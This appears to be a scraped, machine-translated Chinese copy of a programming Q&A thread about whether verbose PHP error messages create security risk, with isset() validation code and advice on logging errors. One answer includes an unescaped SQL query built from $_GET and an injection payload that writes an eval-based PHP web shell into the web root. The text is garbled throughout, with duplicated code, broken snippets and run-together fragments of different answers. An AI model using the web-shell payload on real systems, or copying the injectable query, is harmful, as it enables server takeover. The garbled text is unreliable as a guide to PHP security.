Php 详细的异常/错误消息是否存在安全风险?
我当前使用Php 详细的异常/错误消息是否存在安全风险?,php,security,Php,Security,我当前使用isset()检查每个GET和POST变量,当isset()返回false时抛出异常 示例1: if(!isset($_GET['some_var'])) throw new Exception('GET variable [some_var] is not set.'); $someVar = $_GET['some_var']; if(!isset($_GET['some_num'])) throw new Exception('GET variable [so
isset()isset()if(!isset($_GET['some_var']))
throw new Exception('GET variable [some_var] is not set.');
$someVar = $_GET['some_var'];
if(!isset($_GET['some_num']))
throw new Exception('GET variable [some_num] is not set.');
if(!ctype_digit($_GET['some_num']))
throw new Exception('GET variable [some_num] is not a number.');
$someNum = $_GET['some_num'];
if(!isset($_GET['some_var']))
throw new Exception('GET variable [some_var] is not set.');
$someVar = $_GET['some_var'];
if(!isset($_GET['some_num']))
throw new Exception('GET variable [some_num] is not set.');
if(!ctype_digit($_GET['some_num']))
throw new Exception('GET variable [some_num] is not a number.');
$someNum = $_GET['some_num'];
在另一个集成中,我们得到了“服务器错误402”——这不是一个支付网关。尽管从未在他们的文档中引用过,但显然该消息意味着缺少JSON参数。顺便说一句,这是一个在他们的文档中没有被引用的参数,他们的开发人员再次需要时间来识别它
在上述两种情况下,如果错误消息以有效文档帖子的示例进行响应,则会非常有用。与传递错误参数时旧的Unix/DOS命令返回帮助信息的方式类似。我真的不想和其他程序员说话。我知道他们的时间很昂贵,他们宁愿做些别的事情,也不愿接听支持电话;但更重要的是,如果我在晚上10:00工作,需要一个回复RFN,那么等待程序员第二天可以打电话是一个难得的选择。向用户显示详细的错误可能会带来安全风险。因为在这种情况下,它们只被写入日志文件,用户得到的唯一数据是一个没有显示任何内容的通用页面,您可以随心所欲地描述,除非日志被破坏,否则您不会透露任何信息。通常认为在生产服务器上打印PHP系统错误消息而不是静默记录是不安全的。
虽然我在一般道歉页面中找不到任何危险的东西 记录错误和抑制输出正是您应该做的。错误报告可能很糟糕 在2007年的OWASP前10名中,有一个是,但这在2010年被删除。通过在php.ini中设置
dispaly\u errors=On$vuln_query="select name from user where id=".$_GET[id];
http://localhost/vuln_query.php?id=1 联合选择“进入输出文件”//path/to/web/root/backdoor.php”
select name from user where id=1 union select "<?php eval($_GET[e])?>" into outfile "/path/to/web/root/backdoor.php"
select name from user where id=1 union select“into outfile”/path/to/web/root/backdoor.php
我将确保
display\u errors=Offfile